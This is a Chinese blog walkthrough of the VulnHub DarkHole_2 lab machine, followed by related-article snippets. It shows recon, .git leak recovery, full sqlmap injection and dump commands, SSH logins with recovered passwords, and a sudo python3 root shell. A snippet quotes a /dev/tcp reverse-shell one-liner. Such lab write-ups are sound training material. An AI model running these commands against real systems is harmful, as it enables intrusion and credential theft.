每周打靶-DarkHole系列靶机实-DarkHole_2

已于 2023-09-23 16:25:20 修改
阅读量152 收藏 1
点赞数 1
文章标签: web安全 安全架构 安全 系统安全 网络
于 2023-09-23 16:24:37 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_54178755/article/details/133209589
版权

1.信息搜集

使用nmap扫描存活主机
image.png
继续扫描靶机开放端口及其对应服务,发现开放了22(ssh)、80(http)端口
image.png
使用浏览器进行的登陆,发现登陆按钮,页面上也没有什么其他可点击选项,点击login
image.png
到达登陆界面后尝试了几次登陆,发现不太可行,又因为靶机描述,不要浪费你的时间去暴力破解
image.png
image.png

2…git泄露

此路不通,根据刚才nmap扫描出来的信息,可能存在.git泄露,开始扫描敏感目录,发现确实有
image.png

还可以使用 Githack 或者 Git-dumper 来分析 .git 文件

wget遍历下载 .git 文件
image.png
git log 查看历史提交,发现可疑信息
image.png
使用git reset --hard [log hash]恢复到指定版本号,–hard参数撤销工作区中所有未提交的修改内容,将暂存区与工作区都回到上一次版本,并删除之前的所有信息提交。然后查看 login.php.
image.png

3.SQL(cookie)注入

发现账户密码:lush@admin.com::321,然后去网页端登陆,登陆成功,并发现参数id=1,猜测有sql注入,开始尝试
image.png
打开开发者工具,获取cookie:69jv8dq9dgtq0l35abur53vv1o
image.png
开始使用 sqlmap 进行注入
sqlmap -u "[http://192.168.198.129/dashboard.php?id=1"](http://192.168.198.129/dashboard.php?id=1") --cookie="PHPSESSID=69jv8dq9dgtq0l35abur53vv1o" --batch
发现存在注入漏洞
image.png
sqlmap -u "[http://192.168.198.129/dashboard.php?id=1"](http://192.168.198.129/dashboard.php?id=1") --cookie="PHPSESSID=69jv8dq9dgtq0l35abur53vv1o" --current-db 列出数据库
image.png
sqlmap -u "[http://192.168.198.129/dashboard.php?id=1"](http://192.168.198.129/dashboard.php?id=1") --cookie="PHPSESSID=69jv8dq9dgtq0l35abur53vv1o" -D darkhole_2 --tables 列出表
image.png
sqlmap -u "[http://192.168.198.129/dashboard.php?id=1"](http://192.168.198.129/dashboard.php?id=1") --cookie="PHPSESSID=69jv8dq9dgtq0l35abur53vv1o" -D darkhole_2 -T ssh --dump 将ssh表里的数据都dump下来
image.png
得到账户密码jehad::fool,使用ssh登陆
image.png

4.初提权

开始尝试提权,
sudo权限
image.png
suid文件
image.png
定时任务,发现单独给9999端口开了一个php服务器
image.png
使用kali生成反弹shell
image.png
开启http服务
image.png
使用靶机进行下载
image.png
kali进行 nc 监听 9999 端口
image.png
靶机自己访问shell
image.png
成功获取到shell
image.png

5.中提权

开始提权,尝试 sudo -l 发现不可以,开始查看历史命令 cat 。bash_history
image.png
image.png
发现本用户密码:losy::gang 开始ssh
image.png

6.末提权

登陆成功,查看 sudo -l 权限
image.png
发现可以用 python3 进行提权 sudo /usr/bin/python3 -c "import os;os.system('/bin/bash')"
image.png
完工!!!
image.png
Good game!!!

赵大力
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
Kioptrix2-WalkThrough 靶机复现.docx
10-18
Kioptrix 系列靶场,难度简单至中等,推荐初学者挑战
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
VulnHub-DarkHole_2靶机战(超详细保姆级教程)
精品博客,你值得一看~
08-13 3192
记得我们查看过9999端口运行的程序,当我们看到源代码的内容时,我们看到这允许远程命令执行。bash -c ‘bash -i >& /dev/tcp/192.168.184.156/9001 0>&1’ #记得修改你的IP。id=1' and 1=2 --+ #页面信息消失,说明id的闭合为单引号。到此,我们就可以进行ssh连接了.下面是拓展工具注入的方式.着急看结果的宝宝们可以直接移步下面的ssh连接步骤.
VulnHub-DarkHole_ 2靶机详细渗透过程
MRS_jianai的博客
12-29 951
VulnHub-DarkHole: 2靶机详细渗透过程
靶机-DarkHole_2
weixin_58602402的博客
06-14 160
发现有一个用户losy开启了本地的9999端口,php -s是开启了一个网络服务器的意思。方法一:wget -r http://192.168.12.168/.git/10.先ssh进行登录losy/gang,根据获取的命令利用python调sh。3.对网站进行目录扫描,发现很多git目录,说明存在git源码泄露。1.主机发现,发现靶机ip:192.168.12.168。4.到查找到的目录下查看,发现webshell文件。爆内容,发现用户和密码:jehad/fool。1.用获得的用户和密码进行ssh登录。
vuluhub-darkhole2 打靶记录
lcc001114的博客
06-14 153
系列DarkHole(此系列共2台)发布日期:2021年9月3日提示:不要浪费时间进行暴力破解;使用Vmware虚拟机难度:中目标:取得 root 权限 + 2 Flag主机发现端口扫描信息收集Git 库泄漏SQL注入本地端口转发本地信息收集密码爆破水平提权Root提权1、2。
VulnHub-DarkHole_1靶机详细渗透教程
MRS_jianai的博客
12-30 2012
VulnHub-DarkHole:1靶机详细渗透教程
VulnHub靶机渗透战8-darkhole-2
随心所欲不逾矩
11-22 1339
在历史命令记录中: wget 下载了一个 反弹shell,那我们也要来反弹shell,传shell到靶机上。看到第2次更新时,login.php使用了默认凭证。看到 and id =1,做了防sql注入,那是不是代表登入进去之后就存在sql注入了。因此,我们将 HEAD 切换到该提交,并查看login.php,在这里我们就已经发现账号密码了。history查看一下,losy用户的密码是:gang.网络模式的话,我喜欢用桥接,直接桥接。邮箱账户:lush@admin.com,密码:321.
靶机渗透练习45-DarkHole-2
hirak0的博客
04-19 2005
靶机描述 靶机地址:https://www.vulnhub.com/entry/darkhole-2,740/ Description Difficulty:Hard This works better with VMware rather than VirtualBox Hint: Don’t waste your time For Brute-Forc 一、搭建靶机环境 攻击机Kali: IP地址:192.168.184.128 靶机: IP地址:192.168.184.143 注:靶机与K
靶机渗透练习44-DarkHole-1
hirak0的博客
04-19 849
靶机描述 靶机地址:https://www.vulnhub.com/entry/darkhole-1,724/ Description Difficulty: Easy It’s a box for beginners, but not easy, Good Luck Hint: Don’t waste your time For Brute-Fo 一、搭建靶机环境 攻击机Kali: IP地址:192.168.184.128 靶机: IP地址:192.168.184.142 注:靶机与Kali的
Vulnhub--DarkHole:2
weixin_45168704的博客
06-14 205
DarkHole2
行业文档-设计装置-自动换靶机和连体靶纸.zip
08-21
行业文档-设计装置-自动换靶机和连体靶纸.zip
CISP-PTE_windows操作系统安全V2.0.pptx
10-22
CISP-PTE_windows操作系统安全V2.0 Windows 操作系统安全是计算机安全的重要组成部分。... ... ...访问控制是 Windows 操作系统安全的重要组成部分。访问控制列表(Access Control List,ACL)是 NTFS 文件系统的重要组成...
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
尔滨等保测评践:洞见成功之道与汲取宝贵教训
2301_79527080的博客
06-07 297
为应对这些挑战,根据《中华人民共和国网络安全法》及《信息安全等级保护管理办法》等相关法律法规,哈尔滨市政府及企业主动开展等保测评工作,旨在提升信息系统安全防护能力,确保数据安全与业务连续性。重点强化了数据加密传输、访问控制以及个人信息保护措施。信息安全等级保护测评(简称“等保测评”),作为确保信息系统安全的关键环节,近年来在哈尔滨得到了广泛的应用与践。教训一:管理制度滞后于技术部署• 在一些早期施的等保项目中,企业过分注重技术设施的投入,却忽视了与之配套的安全管理制度建设,导致安全策略执行不力。
网络安全管理组织架构复习
最新发布
LongL_GuYu的博客
06-12 289
网络安全管理组织架构复习
网络安全的神秘世界】web应用程序安全与风险
weixin_54750312的博客
06-05 1331
web攻击的本质,就是通过http协议篡改应用程序(永远不要相信用户的输入)可利用点:请求方法、请求头、请求体利用过程:认证、会话、授权弱口令强口令账号枚举认证不满足强口令条件密码长度至少8位包含大小写字母、数字、特殊字符中的至少3类密码和用户名无相关性尝试大量可能的账号名称,以找出系统中存在的有效账号为了密码爆破做准备,节省攻击时间判断下面属于什么口令:admin@123#1 --弱口令,与用户名相关。
网络安全】【深度学习】【入侵检测】SDN模拟网络入侵攻击并检测,时检测,深度学习【一】
q742971636的博客
06-09 1281
Mininet: 主要用于创建和模拟虚拟网络拓扑,适合于网络验和研究。Ryu: 主要用于开发和运行 SDN 控制器,用于管理和控制网络设备。这两个工具通常可以结合使用:使用 Mininet 模拟网络环境,使用 Ryu 作为 SDN 控制器来管理模拟网络中的设备和流量。
sqlmap进行os-shell需要靶机开启3306端口和MYSQL远程登陆吗
07-13
2. 目标靶机上的MySQL服务需要监听在一个网络可访问的端口上,通常是默认的3306端口。 如果目标靶机满足上述条件,SQLMap就可以通过与目标数据库建立连接并执行操作系统命令,从而现OS shell攻击。 然而,值得...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值